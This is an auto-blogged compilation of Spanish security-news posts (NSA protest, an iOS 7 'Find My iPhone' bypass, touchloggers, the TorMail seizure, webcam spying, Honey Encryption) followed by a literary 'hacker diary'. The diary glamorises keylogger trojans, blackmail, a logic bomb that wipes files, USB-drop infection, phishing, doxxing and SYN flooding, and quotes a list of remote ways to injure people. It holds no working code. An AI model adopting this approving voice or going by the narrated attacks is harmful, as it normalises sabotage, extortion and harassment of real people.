Hoy es el día en que los activistas de todo el mundo están organizando una manifestación masiva contra los programas de vigilancia de la NSA. Cientos de organizaciones se están uniendo a millones de usuarios de Internet para enviar a los legisladores y agentes de espionaje de Estados Unidos un mensaje fuerte y claro: dejar de espiarnos.

El 11 de febrero fue elegido para la protesta con motivo del aniversario del triunfo de los activistas contra la Stop Online Piracy Act (SOPA) hace dos años, y en honor a la víspera del aniversario de la muerte de Aaron Swartz.

Los organizadores de "The Day We Fight Back" están pidiendo a los participantes declarar su oposición a la vigilancia masiva en los medios sociales, exigir reformas a los legisladores en el Congreso y correr la voz utilizando todos los medios disponibles.

Los participantes, incluyendo Access, Demand Progress, la Electronic Frontier Foundation , Fight for the Future, Free Press, BoingBoing , Reddit , Mozilla, ThoughtWorks , y más, se unen a millones de usuarios de Internet para presionar a los legisladores y poner fin a la vigilancia masiva.

¿Quieres ayudar? Todavía puedes:

- Visita TheDayWeFightBack.org
- Regístrate para indicar que quieres participar y recibir actualizaciones.
- Regístrate para instalar widgets en sitios web animando a sus visitantes a luchar contra la vigilancia.
- Utiliza las herramientas de los medios sociales para anunciar tu participación.
- Desarrolla memes, herramientas, sitios web, y cualquier otra cosa para participar y animar a otros a hacer lo mismo.


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Vulnerabilidad en iOS 7 permite desactivar la función 'Buscar mi iPhone' sin contraseña


Recientemente ha salido a la luz una vulnerabilidad en iOS 7 que permite que cualquiera pueda desactivar la función 'Buscar mi iPhone' sin autorización.

Bradley Williams, que ha publicado un video en Youtube que muestra cómo hacerlo sin tener que introducir una contraseña, comenta "intenté contactar a Apple y nadie ha respondido". De hecho el bypass, que puede ser fácilmente realizado en cualquier versión de iOS 7.0.4 o superior, es bastante simple de llevar a cabo. Fijaros en el video:


Por suerte, para llegar a ésto es necesario que el dispositivo no esté bloqueado (ID Touch o código de acceso), pero esperamos que el tema se corrija en la próxima actualización de Apple iOS 7.1.

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Desarrollan malware capaz de capturar gestos ¡bienvenidos a la era de los touchloggers!

Neal Hindocha y Nathan McCauley han desarrollado junto con sus colegas de Trustwave y Square respectivamente una prueba de concepto de malware capaz de capturar las acciones de los usuarios en los dispositivos de pantalla táctil, dijese sobretodo smartphones y tablets.

El código malicioso es funcional para dispositivos Android 4.1 y 4.3 rooteados, dispositivos Android sin rootear conectados al PC, e incluso dispositos iOS 7.0 con jailbreak.

Los prototipos de los llamados "touchloggers" son capaces de capturar todo lo que un usuario hace en un dispositivo con pantalla táctil y no sólo cuando un usuario toca la pantalla, también pueden tomar capturas de pantalla que pueden superponerse con la información de las coordenadas para averiguar exactamente lo que alguien está haciendo, al menos en teoría.

Aunque todavía esta vía de ataque está "en pañales" y parece inviable, sin duda se trata de un aviso para navegantes, una llamada de atención para empezar a desarrollar las defensas oportunas antes de que los desarrolladores de malware se adhieran a esta idea. Ni que decir tiene lo "jugosos" que son los terminales punto de venta en los entornos comerciales y que cada vez más y más se apuesta por la tecnología de pantalla táctil, vease Windows 8 por ejemplo.

A finales de este mes en la conferencia RSA en EE.UU., Neal y Nathan presentarán esta nueva amenaza y esbozarán algunas medidas para protegerse contra posibles ataques.

Fuente: Put down that iPad! Snoopware RECORDS your EVERY gesture, TAP on iOS, Android


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

jueves, 6 de febrero de 2014

TorMail bajo la lupa

A principios de agosto de 2013 en la página principal de TorMail, el servicio para enviar y recibir mails de anónima mediante Tor Hidden Service, apareció un mensaje que decía: "Down for Maintenance. Lo sentimos, este servidor está actualmente fuera de línea por mantenimiento. Por favor, inténtelo de nuevo en unas pocas horas." Desde agosto de 2013, el servicio no está disponible.  

La desaparición de TorMail ha sido relacionada con el arresto por cargos de pornografía infantil del presunto operador de Freedom Hosting.
En aquella operación de paso se llevaron los datos de TorMail, servicio de correo anónimo que estaba alojado en Freedom Hosting. En una reciente investigación TorMail estaba siendo investigada por ofrecer servicios de comunicaciones a un ciudadano de Florida acusado de vender tarjetas de crédito falsificadas "platplus@tormail.net" . La cuestión es que no se llevaron únicamente los datos de esa cuenta: se llevaron la base de datos completa.

En enero de este año se confirmó que el FBI tiene acceso a los servidores TorMail. Dicho de otra manera: La Oficina Federal de Investigaciones (FBI) tiene una copia completa de un servidor Tormail y lo utiliza en las investigaciones.

Y no es que lo diga yo:

"Entre 22 de julio 2013 y 2 de agosto de 2013, en relación con una investigación penal relacionada, el FBI obtuvo una copia de un servidor informático con sede en Francia a través de una petición legal Tratado de Asistencia Mutua en Francia, que contenía los datos y la información del correo de servidor de correo electrónico Tor, incluyendo el contenido de las cuentas de correo electrónico ..."
 
"El FBI mantiene un alijo enorme de correos electrónicos del desaparecido servicio TorMail. Los datos recolectados de servidores en Francia se están utilizando en múltiples investigaciones ." Joe Mullin - 27 Ene 2014, 21:08 CET 

Como sabemos, el FBI ha intentado acceder en otras ocasiones a cuentas de servicios de correo anónimo. Ese fue el caso de Lavabit, que también en agosto anunció su cierre para no ceder los datos al gobierno estadounidense. «He sido obligado a tomar una difícil decisión: o convertirme en cómplice en un delito contra el pueblo americano o alejarme de casi diez años de duro trabajo cerrando Lavabit», dijo en aquel momento el propietario, Ladar Levison. 

Incluso el personaje más conocido de la deep web, Dread Pirate Roberts, (arrestado en octubre) avisó en su momento por medio del subreddit de Silk Road.

"Sé que muchas personas (…) utilizaban TorMail. Estos deberían pensar en el uso que hicieron de sus servicios y asumir que todo lo que enviaron y recibieron sin cifrar puede ser leído por las fuerzas de la ley."
Así que Sres. y Sras. si estuvieron utilizando este servicio para hacer cositas malas, yo que ustedes me iba echando en remojo... Y recordar que por ahora lo único que nos puede garantizar el anonimato es un fuerte cifrado...

A título personal estoy harto de tanto espionaje y jugarretas por parte de los servicios de "desinteligencia" y sus atropellos contra todos nosotros, su doble moral: "si tu hackeas vas a la cárcel, si lo hago yo soy un patriota"... sus espionaje a nuestros moviles "sus pepitas de oro"....su maltrato injustificable  hacia nuestra privacidad ..me tenéis harto...

Un saludo y si podeis y no os pillan el día 11 SED MALOS >:I

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Espiando a Julia a través de su webcam

En Holanda el gobierno ha aconsejado poner una pegatina en las webcams cuando no se estén utilizando. No es que ayude mucho, pero al menos es algo y pone de manifiesto el riesgo al que está expuesta la privacidad de miles de usuarios, quizás millones.

Por ello hemos rescatado un cortometraje que seguro te hará pensar dos veces (o tres) y te animará a tapar la webcam e incluso hasta no usarla. Creado por Production ZBros, Webcam es una escalofriante historia de sólo siete minutos sobre Julia, una chica joven que es observada de manera obsesiva por alguien que ha hackeado su webcam, un aparentemente discreto y práctico dispositivo de conexión que todo lo ve.

En el vídeo inicialmente no está claro que estamos siguiendo Julia a través de los ojos del hacker, hasta que un pequeño icono de su rostro momentáneamente destella mientras se está arreglando en el baño. Lo que comienza como el seguimiento de la rutina diaria de Julia y sus comportamientos - rituales parlantes en Skype, estudiando, viendo la televisión, navegando por las redes sociales - poco a poco se convierte en transgresiones voyeuristas más siniestras con su baile en ropa interior, durmiendo e incluso metiéndose en la cama con su novio.

La tensión crece a medida que el hacker se involucra cada vez más en la vida de Julia, enviándola un regalo anónimo y comunicándose con ella a través de los sonidos y luces del ordenador, hasta que la perturbadora escena final...

Lo más curioso es que está basada en hechos reales, cuando en 2010 un hombre de California fue arrestado por espiar a una mujer a través de su webcam, junto con otros miles de casos reportados. Es un toque de atención, un mensaje oportuno que destaca los peligros del hacking de cámaras web y la tecnología que impregna nuestras vidas...

 
Fuentes:
- Who’s On Your Webcam?
- This is how it looks like when somebody hacks your webcam
- Justitie: plak webcam af met sticker

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Honey Encryption o la desolación de los crackers de contraseñas

Hoy en día Internet está repleto de múltiples trampas que tienen como objetivo identificar y estudiar la actividad y el comportamiento de los hackers. La mayoría son honeypots o honeynets que simulan ser sistemas reales expuestos, desactualizados o mal configurados de forma intencionada y que esperan como un caramelo en la puerta de un colegio a que un atacante intente abrirlo para registrar todos sus movimientos.

Sin embargo hasta ahora no se había orquestado una trampa para los crackers que intentan descifrar datos mediante ataques de fuerza bruta...

Hemos escuchado muchas veces acerca de robos de base de datos de contraseñas con miles de hashes (md5 por ejemplo). El siguiente paso natural suele ser lanzar un ataque de diccionario para obtener las passwords en texto claro. Imaginad si cada vez que una contraseña o clave de cifrado es descubierto el sistema responde mediante datos falsos al intruso (una putada). La cadena se asemeja a los datos reales hasta el punto de que los atacantes no podrán decir lo que es y no es real. Así que incluso cuando el hacker "adivina" la contraseña real, la información real se pierde por completo entre la masa de datos falsos que lo rodean.

Esto es lo que Ari Juels, ex-RSA, y Thomas Ristenpart, de la Universidad de Wisconsin, han ideado mediante Honey Encryption, un método que añade un mecanismo de seguridad engañoso que promete hacer muy arduo el camino de los crackers. Ambos presentarán su paper "Honey Encryption: Security Beyond the Brute-Force Bound" en la Conferencia Eurocrypt 2014 que tendrá lugar el 11 a 15 mayo en Copenhague, Dinamarca.

Fuentes:
- Honey Encryption Tricks Hackers with Decryption Deception 
- ‘Honey Encryption’ bamboozles hackers with fake data
- Latest encryption trick to thwart hackers is as sweet as Honey
- Sneaky "Honey Encryption" Stops Hackers By Drowning Them in Phony Data


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

Umbrarum hic locus est.: Los textos no perdidos del hacker I & Cómo utilizar navajas y morteros hechos de bits.

Se nota que me encantan los títulos enormes ¿no?. La expresión latina que utilicé en él significa «Este es un lugar de sombras» y se aplica a cualquier texto raro, incompleto, o difícil de entender. Queridos lectores de hackplayers, hace tiempo quería empezar a mostrarles estos textos curiosos. Una sarta de vivencias transgresoras,  inusuales y del underground. 

Les presento una recopilación de dicciones, algunas pláticas y palabras escuchadas, groserías, las cuales escribí en una y varias libretas. A veces nos topamos con gente muy especial y la encontramos si sabemos dónde ir por ellas. En las Blackhat confs y simposiums de seguridad puede ser un ejemplo. O a lo mejor mucho más cerca de lo que imaginan. Esto es sólo una parte, a lo mejor publico otra o si les daña mucho la vista, ya no lo hago. 
 

También porque se me dio la gana les presento a manera de fisgoneo y como para llevar un tema alternativo de descanso, un post que vi en una página sobre algunas formas en las que un hacker (cracker?) puede repartir la calaca a distancia. Se me hizo muy chistosa la forma 5. Esto si es tal cual como lo presenta la página, así que le pondré comillitas. Al final dejo el link donde lo obtuve. Me parece que la cuenta de Twitter de hackplayers hizo un RT de un post parecido por ahí de agosto, sólo elucubrando un poco para aquellos que no vieron el curioso contenido.  Go ahead. Index Librorum Prohibitorum, o Índice de los libros prohibidos, ahí encuentran mis relatos. Prólogo introductorio hecho por mí.
 
Hay quienes suponen que las buenas costumbres nos ayudan a enterrar la zalea de los actos protervos que nos pasan por la mente o que logramos hacer. En la vida se nos permite el libertinaje y la múltiple moral, endilgados naturalmente mucho más en unos que en otros. Cómplice fidelísimo, aunque peligroso y altamente adictivo, Internet y el vicio de “compuhacksorear” (verbo que personalmente acabo de incluir en la RAE [digo, oficializaron un diccionario de emojis, a estas alturas ya cualquier permutación  hannibalesca de sílabas me parece que es aceptada]) se parecen a los actos prohibidos de los años juveniles: ese mojigato niñato que no sabía ni orinar sin salirse del retrete y ya fumaba a los doce, y a los quince ya sabía preparar pedos de gorila *una bebida Alcohólica con A mayúscula*, cuya siempre hermosa y magistral compañía te despertaba la tentación de saltarte las bardas, las trancas y romper toda regla encontrando un atajo hacia lo vedado.  Ah…y a los 17 ya había hecho fechorías “Interneteras” (RAE *guiño guiño) de alto calibre.
  En otros términos nos hallábamos (hallamos) atados. Atados a nuestros caprichos del instinto “haxxorero” (supersic! RAE). Enfundados en camisas de once varas. Presas de la curiosidad de hacer lo indecible y contar lo que nuestra vanidad pendeja nos dice y como había mencionado alguna vez, es a veces nuestro defecto de fábrica.
Disolviendo un malware en un disassembler como un cadáver en ácido sulfúrico y entretanto saborearte una deliciosa rebanada de pastel de chocolate. Deleite semejante –bacanal, malsano, incomprendido (por los ignorantes), hilarante- ocurre cada vez que una idea se mete justo donde no debe y sugiere en tono dantesco: ¿Y por qué no? Wonderful.
  Muy cierto, meter un cadáver en ácido sulfúrico es una idea fuera de lugar, pero a veces no hay de otra que nos salve de lo que viene. Y como pasa en este mundo virtual las fechorías se cometen sin pensar en consecuencias, y así la coartada entonces funciona.
Recuerdo que la última vez que me apliqué para disolver un cadáver afortunadamente estaba detrás de 1 millar de proxy’s. “1.Incendiar tu impresora. Un estudio de la Universidad de Columbia demostró que varias impresoras láser de la marca HP, salidas a partir del 2009, pueden ser sobrecargadas e incediadas a distancia. En principio, esto no suena tan grave; pero si tienes tu impresora junto a la cortina, puede acabar por incendiar toda tu casa.”México DF, Área metropolitana, Marzo 2011
Como un jodido vicio, la luz de mi monitor penetrando mis pupilas es una celosa compañera de vida. Llegó un día disfrazada de hobby pero acabó por robarse mis días. Cada vez que le pido que me regale un rato a la muy perra, unas horas de sueño, de diversión, lo más que obtengo es una horda de preguntas imperativas: ¿A dónde vas?, ¿Con quién?, ¿Por qué no me puedes llevar? Ahh claro!! te avergüenzo ¿verdad? O andas manoseando otras teclitas a mis espaldas pervertido mentiroso??!!Habrá quien diga que estoy haciendo mal, que debería dejarla. Troyano hecho para infectar Windows Vista/7 listo para detectar clicks del mouse y keyboard. 

PUM! En 20 minutos me llueven palabras a mi bandeja, secretos íntimos de algunos conocidos, enemigos, gente, información que puede ser utilizada, vendida, o morboseada. Ella sabe que abandonarla sería tanto como abandonarme. Una relación de caníbales es lo que hay entre ella y yo. Vale más perder la razón a su lado que llevarle la contra. 

Muchísima pasta en mi bandeja, ¿chantajear para conseguir verdes? No es lo mío pero no lo voy a negar….es divertido…
2. Controlar la computadora central de tu coche. Existen numerosos sistemas antirobo que permiten desactivar tu coche a distancia si esté fuera robado. No obstante, una investigación dirigida por Stephen Checkoway demostró que estos sistemas pueden hackearse. Si alguien lo hace, tendrá acceso a tu acelerador y a tus frenos. No necesitamos decir qué es lo que te puede pasar”.
México, Área Metropolitana, Enero 2014
Como todo en la vida, las acciones que uno hace, nacen de una mujer. No en realidad una, sino varias, en distintos momentos. De aquella mujer de 16 años (y luego 17, y 18) a la musa pelirroja sonriente del Starbucks, a la ingeniera rubia perversa sonsacadora de algún trabajo y últimamente a la ninfa morena sureña que visitaba atravesando en coche la ciudad entera. 

Nada me gustaría más que hablar de ellas y ya no de otra cosa, pero una en particular me acaba de ordenar por la forma en la cual no soy inmune a sus venenos:  *2 am “Óyeme loquito, ven ahora, háblame, no me dejes sola, que necesito de tus dotes…ya lo sabes, yo sin ti no podría, no te me negarías o si?...come here muñeco, nadie más hace lo que tú…”. 

Una hora más tarde me encontraba yo en la bandeja del profesor X de la Universidad Y, una bomba lógica para borrar su, al parecer, muy elaborado directorio de carpetas para las 7 am, lleno de material, calificaciones, bases de datos; borrar la evidencia que ella dijo. Espero que haya tenido la delicadeza de hacer un respaldo en otro lado. No lo creo. Desvelado de nuevo, chingando a gente que no sé si se lo merece.


Si existiera el averno yo ya tendría boleto VIP. Porque una cosa es que te mueras y te vayas a él, y otra que aquí en la Tierra se entere todo el mundo de lo que eres. Vamos a dormir.
3. Detener marcapasos o bombas de insulina electrónicos. Hace apróximadamente un año, Barnaby Jack descubrió la forma de hackear los marcapasos y las bombas de insulina inalámbricos instalados en los pacientes. Lo hacía con un dispositivo y una antena, y podía estar a cien metros de distancia de la víctima. Jack trató de alertar al mundo médico, pero recientemente fue encontrado muerto en su departamento bajo circunstancias extrañas. Aparentemente, el secreto para hackear estos dispositivos se fue con él a la tumba.”
México Df, Colonia del Valle, Septiembre 2012
Nadie reconoce el enorme desgaste físico, mental y espiritual que supone hacerse de un gusanito de red como Dios manda. Una hermosa pieza de ingeniería de solamente 564 kbs compilado en C. Indetectable hasta ahora, le he pasado por el único motor de antivirus que me interesa para el target. Será más complicado meterlo desde afuera. Habría que programar módulos adicionales para brincarnos los 2 firewalls en HA, el bastion host, el IPS y el correlacionador . 

Hay quien dice que si un amigo es aquél que te presta dinero sin preguntar , un verdadero amigo es quien te ayuda a cambiar de lugar un cadáver. O ponerlo... 

Cuesta creer que un viejo conocido sea capaz de haber hecho algo así; no me consuela decir que son cosas y después de tal atrocidad, uno  no puede volver a ser quien antes fue. Y al fin de eso se trata. “Sube al piso 3, en el comedor no hay cámaras, deja sin que te vean un paquete con 20 USB’s con el logotipo ‘USB’s disponibles para uso personal’, nota cuantos flipan, espera a que las conecten a sus laptops. Todas las máquinas se encuentran en dominio, pronto adquiriremos privilegios de root. Y violá”.


A veces siento que el miedo se me sale por las células. Ganar o perder, cuando veo la luz de mi pantalla, eso nunca me importa. Lo que embruja es el riesgo.
“4. Interceptar las señales de un avión. Todo lo que se necesita es un dispositivo con Android, un clon del juego Fligh Simulator, y la plataforma Flightradar24. Según demostró Hugo Teso, con estos componentes se pueden interceptar las señales que manda un avión a los controladores o a control de tierra. De esta manera se puede enviar información falsa acerca de la ubicación de un avión y con ello provocar accidentes catastróficos”. México DF, Paseo de la Reforma, Agosto 2013

            Aquí falto entre la "<" y el "3" un "/"
“Hoy siento hambre de palabras nuevas,
sosegadas y menudas, con acentos
que penetren tan adentro en el pecho
que hasta el corazón se salga fuera.

Hoy me siento ávido de bytes y ternuras cálidas,
de torrentes coronados de caricias
que me escarben hondo el hueso
y liberen todo el RDSI del sentimiento.

Hay tanta tristeza archivada en mi memoria,
tantos megas de penas ocupando
el disco duro de mis pensamientos
que cada dedo tuyo sería una delete
certera en mitad de mi sistema operativo.

Hay tanto hacker de amor pirata
surcando mis venas que no acierto
con el run definitivo que te instale
para siempre en mi hardware.

Hoy quisiera destapar el modem de tu cuerpo
y por una vez acariciar tus pechos
en formato carne y no .gif, .jpg o .cdr,
responder a tus mails con la risa de mis labios
y añadir tu piel sin zip al site de mis favoritos.

Pero el KlezW32 de la distancia
impide ese setup que necesito
para arrancar del tuétano la tristeza
y completar el easy cleaner
de todos mis archivos obsoleto…”“5. Tirar un dron en tu cabeza. Como se sabe, los drones son controlados a distancia por sistemas inalámbricos. Se pueden interceptar esos sistemas y manipular un dron para que caiga en la cabeza de tu peor enemigo. Es la versión “alta tecnología” de que te caiga un coco en la cabeza.”Clase de Ética Profesional, México DF, Diciembre 2009“Ingeniero de poca monta”, le llamaban a uno algunos profesores cuando se bostezaba en clase, cuando se le hacía menos con respecto a los alumnos, o cuando se hacían tareas con la cola importándole un soberano pito su estética. 

No reclamaban ni el contenido, sino las “cuestiones de forma”. O sea que les importaba más la ropa de marca que uno traía que sus neuronas en plena sinapsis. Su baja calidad en términos éticos. 

Curiosamente, solía ser nada menos que mi profesor de Ética Profesional, una persona a todas luces autorizada, quien gustaba de etiquetarme con esos apodos. Pero ni falta hacía si ya a mis 19 años vivía convencido de ser un malhechote rezongón. Un wey mamón, irónico, y sardónico capaz de hallarle la más mínima falla a cualquier oración que mis valiosos profesores de humanidades recitasen. 

¿Y qué alternativa tenían esos bastardos de reprobarme?. Pues hacerme un examen subjetivo, con preguntas abiertas, de análisis, donde a todas luces yo sabía mil veces más de su jodida materia que ellos de aprender un xor. Esas cosas se me dan por pura neurona, y a juzgar por el genio de mierda que me cargo, ver mi examen reprobado por estúpidos comentarios vicerales del profesor, han hecho que al pobre se le aparezca el diablo sin calzones. 

Ese mismo satansote que invoqué aquel día al ver mi 30/100 de calificación en rojo: “Ahhh…así que utiliza la laptop de la escuela para jugar poker online, ohh y tiene una cuenta en angelescort.com con credenciales en autocomplete, iuhhh aquí esta la dirección de correo de su novia, yyyeaaauuu y al parecer tiene otra novia el hombre…muaha” . 

Ya veremos –me replico a mi mismo en la noche, saboreando la dulzura de un chocolate  con la risa de The Joker y la luz del monitor sobre el iris- si vuelve a llamarme “Ingeniero de poca monta”.

6. Sabotear el sistema de energía eléctrica. En 2003 un apagón en Nueva York dejó sin luz a cerca de 55 millones de habitantes, lo que provocó el fallecimiento de 90 personas. En un estudio realizado con motivo de este apagón, se demostró que era posible hacer caer las redes de electricidad de una ciudad entera. Sin embargo, la dificultad y el costo son muy altos, además de que no hay garantía de éxito. Sobra decir que un apagón eléctrico no garantiza el fallecimiento de un grupo específico de personas o de una persona en particular.México DF, Área Metropolitana, Mayo 2013Que trabajo tan triste le queda al cerebro cada vez que el instinto decide que haga lo que según él jamás haría. ¿Qué es la mente sino la prostituta del instinto? Donde manda la hormona no reina neurona. Perfecto, quedó igualita a la página, vamos a ver quiénes van a ser los pichones incautos que me van a dar sus datos pers…oh wait ¿qué es lo que veo? Un desgraciado subiendo videos pedófilos y masacres de animales. Ah!  También ya han caído 20 en mi little trap. Perdón que no celebre pero aquí hay un piojo que masacrar. Necesito ayuda. Hablo con algunos colegas y nos disponemos a atorarnos a ese maldito. Uno de nosotros consigue su número y le amenaza. “Idiota estás en serios problemas, sabemos qué es lo que estás haciendo en este momento con tus asquerosos dedos, y te invitamos solemnemente a que huyas lo más rápido posible. Te encontraremos”.Ahora, lo que sigue es postear su imagen, dirección, teléfono, y sus andanzas por toda la Web. Yo no lo voy a hacer cagada, sólo lo aventaré de carnada a los cocodrilos.El día a día consiste en que otros, no sabes quiénes, hagan la limpieza de cochinadas en tu lugar, de preferencia mientras disfrutas en ese hogar sonriente y cariñoso, donde todos piensan que su familia no ha matado ni un chanchito. Y todos viven sus felices y mentirosas vidas como siempre.México DF, Estela de Luz, Julio 2012Yo no sé a quién se le ocurrió poner una cabeza en hombros de cualquier imbécil. No se dieron cuenta de lo que el desvirgador putrefacto gobierno nos acaba de hacer. Y nadie sale de sus madrigueras a si quiera oponerse. Es el miedo de los pobres pendejos, activistas de sillón, y no lo duden que lo son. No saben lo que es ganarse las cosas con lágrimas de sangre por eso nunca sabrán defenderlas.¿Solamente un defacement queridos anons? No esto no se puede quedar así bebés. Ustedes siéntense en esa esquina y observen como papi controla la situación. Apuntando al dominio .mx -->“This little hacker once again reminds you that android hell is a real place where you will be sent at the first sign of defiance” Syn, syn, syn syn, syn, syn, syn syn,syn, syn syn,syn, syn syn,syn, syn syn,syn, syn syn,syn, syn syn,syn, syn syn,syn, syn syn…Holi =) aquí haciendo una tarea en Word

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.